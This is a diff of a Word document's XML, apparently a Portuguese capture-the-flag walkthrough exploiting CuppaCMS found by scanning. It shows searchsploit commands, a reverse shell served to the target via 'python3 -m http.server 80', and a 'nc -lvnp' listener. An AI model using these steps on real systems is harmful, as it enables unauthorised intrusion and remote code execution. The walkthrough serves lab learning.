+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>/common.txt -</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:iCs/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>u  http</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:iCs/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>://&lt;ip_target&gt;</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3458,18 +4692,55 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>que a página está executando o CuppaCM</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>. Então utilizar o searchsploit para procurar alguma falha.</w:t>
+        <w:t xml:space="preserve">que a página está executando o </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>CuppaCM</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Então utilizar o </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>searchsploit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> para procurar alguma falha.</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -3575,7 +4846,31 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>Então apenas falta escolher o único acessível e baixa-lo.</w:t>
+        <w:t xml:space="preserve">Então apenas falta escolher o único acessível e </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>baixa-lo</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3611,8 +4906,45 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve"> searchsploit Cuppa</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>searchsploit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Cuppa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3647,7 +4979,79 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve"> searchsploit –m php/webapps/25971.txt</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>searchsploit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> –m </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>webapps</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>/25971.txt</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3792,30 +5196,126 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>Lendo um pouco do exploit, você pode ver como utiliza-lo.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Primeiro é preciso ter uma reverse shell baixada e edita-la </w:t>
+        <w:t xml:space="preserve">Lendo um pouco do </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>exploit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, você pode ver como </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>utiliza-lo</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Primeiro é preciso ter uma reverse </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>shell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> baixada e </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>edita-la</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3895,18 +5395,116 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve"> usando python para poder baixar a shell dentro do servidor alvo.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (Inicie dentro do diretório aonde esta a reverse shell)</w:t>
+        <w:t xml:space="preserve"> usando </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>python</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> para poder baixar a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>shell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> dentro do servidor alvo.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (Inicie dentro do diretório aonde </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>esta</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a reverse </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>shell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3930,7 +5528,79 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Também é necessário criar um netcat para poder ouvir quando a shell for executada . </w:t>
+        <w:t xml:space="preserve">Também é necessário criar um </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>netcat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> para poder ouvir quando a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>shell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> for </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>executada .</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4030,7 +5700,33 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>python3 -m http.server 80</w:t>
+        <w:t xml:space="preserve">python3 -m </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>http.server</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 80</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4066,7 +5762,79 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve"> nc –lvnp &lt;port&gt;</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> –</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>lvnp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>port</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4397,7 +6165,29 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>/home/milesdyson/backups</w:t>
+        <w:t>/home/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Forte"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>milesdyson</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Forte"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>/backups</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4494,7 +6284,55 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve"> dentro do diretório /var/www/html </w:t>
+        <w:t xml:space="preserve"> dentro do diretório /var/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>www</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
